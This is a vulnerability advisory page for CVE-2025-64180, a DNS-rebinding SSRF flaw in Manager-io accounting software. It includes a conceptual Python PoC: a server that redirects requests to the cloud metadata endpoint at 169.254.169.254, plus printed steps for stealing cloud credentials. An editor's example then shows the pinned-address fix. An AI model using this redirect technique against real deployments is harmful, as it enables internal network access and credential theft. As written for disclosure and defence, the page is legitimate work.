Security Vulnerability Report
CVE-2025-64180 CVSS 10.0 CRITICAL

CVE-2025-64180

Published: 2025-11-07 04:15:47
Last Modified: 2026-04-15 00:35:42

Description

Manager-io/Manager is accounting software. In Manager Desktop and Server versions 25.11.1.3085 and below, a critical vulnerability permits unauthorized access to internal network resources. The flaw lies in the fundamental design of the DNS validation mechanism: a Time-of-Check Time-of-Use (TOCTOU) condition allows attackers to bypass network isolation and access internal services, cloud metadata endpoints, and protected network segments. The Desktop edition requires no authentication; the Server edition requires only standard authentication. This issue is fixed in version 25.11.1.3086.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

Manager Desktop <= 25.11.1.3085
Manager Server <= 25.11.1.3085

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-64180 PoC - Manager-io/Manager DNS TOCTOU Bypass
# This PoC demonstrates the DNS rebinding technique to exploit the TOCTOU vulnerability
import http.server


class DNSRebindingHandler:
    def __init__(self):
        self.first_request = True
        self.attacker_ip = "attacker.controlled.domain"  # placeholder, attacker-controlled name
        self.internal_ip = "169.254.169.254"  # AWS metadata endpoint

    def handle_dns(self, query):
        """DNS handler that returns different IPs on first and subsequent requests"""
        if self.first_request:
            self.first_request = False
            return self.attacker_ip  # Return safe IP for initial check
        return self.internal_ip  # Return internal IP for actual exploit

    def start_malicious_server(self):
        """Start HTTP server that triggers internal network access"""
        internal_ip = self.internal_ip  # captured here; `self` inside Handler is the request handler

        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                # Craft request that Manager will follow to internal network
                self.send_response(302)
                self.send_header('Location', f'http://{internal_ip}/latest/meta-data/')
                self.end_headers()

        server = http.server.HTTPServer(('0.0.0.0', 8080), Handler)
        server.serve_forever()


def exploit():
    """
    Exploitation steps:
    1. Attacker controls DNS for malicious domain
    2. First DNS query returns external IP (passes validation)
    3. Subsequent queries return internal IP (169.254.169.254)
    4. Manager follows redirect to internal metadata endpoint
    5. Attacker retrieves cloud credentials from metadata service
    """
    print("[*] Starting CVE-2025-64180 exploitation...")
    print("[*] Step 1: Register malicious domain with controlled DNS")
    print("[*] Step 2: Wait for Manager to validate external IP")
    print("[*] Step 3: Switch DNS to point to internal network")
    print("[*] Step 4: Manager accesses internal resources via redirect")
    print("[*] Step 5: Extract sensitive data from metadata endpoints")
    # Note: This is a conceptual PoC. Actual exploitation requires:
    # - Registered domain with custom DNS server
    # - Understanding of Manager's specific DNS validation logic
    # - Network positioning to perform DNS rebinding attack


if __name__ == "__main__":
    exploit()
```
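Added here as an editor's example, not code from this page or from Manager-io: a simulated resolver that rebinds after the first lookup, the check-then-resolve-again pattern the description calls a TOCTOU (CWE-367 leading to CWE-918), and the pinned-address alternative that validates every hop, including the 302 redirect the PoC relies on. The resolver stub, hostnames, the public address and the redirect map are constructed.

```python
import ipaddress
from urllib.parse import urlparse

class RebindingResolver:
    """Constructed stand-in for an attacker-controlled DNS server: the first
    lookup of a name answers with a public address, every later lookup with
    an internal one (the rebinding the PoC describes). Literal IPs pass through."""
    def __init__(self, first, later):
        self.first, self.later, self.calls = first, later, 0

    def resolve(self, host):
        try:
            return str(ipaddress.ip_address(host))   # already a literal address
        except ValueError:
            self.calls += 1
            return self.first if self.calls == 1 else self.later

def is_allowed(ip):
    """Policy: only globally routable addresses may be contacted. This rejects
    loopback, RFC 1918, and link-local (169.254.0.0/16, where cloud metadata lives)."""
    return ipaddress.ip_address(ip).is_global

def vulnerable_connect(url, resolver):
    """TOCTOU pattern: validate one lookup, then let the HTTP client resolve
    the name a second time when it opens the socket."""
    host = urlparse(url).hostname
    if not is_allowed(resolver.resolve(host)):   # time of check
        raise PermissionError("blocked by validator")
    return resolver.resolve(host)                # time of use: fresh lookup

def pinned_connect(url, resolver):
    """Fix: resolve once, validate that exact address and connect to it; the
    hostname goes only into the Host header / SNI, never into a new lookup."""
    host = urlparse(url).hostname
    ip = resolver.resolve(host)
    if not is_allowed(ip):
        raise PermissionError("blocked by validator")
    return ip

def follow_redirects(url, resolver, redirects, connect, max_hops=5):
    """Run `connect` on the start URL and on every Location it redirects to,
    so each hop is validated; `redirects` maps URL -> Location (constructed)."""
    hops = []
    for _ in range(max_hops):
        hops.append(connect(url, resolver))
        if url not in redirects:
            return hops
        url = redirects[url]
    raise RuntimeError("too many redirects")
```

With the rebinding resolver, `vulnerable_connect` ends up at the metadata address while `pinned_connect` stays on the address it validated, and the redirect hop to a literal 169.254.169.254 is rejected because each Location goes through the same check.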

References

Weaknesses: CWE-367 (Time-of-check Time-of-use Race Condition), CWE-918 (Server-Side Request Forgery)
Advisory: https://github.com/Manager-io/Manager/security/advisories/GHSA-j2xj-xhph-p74j
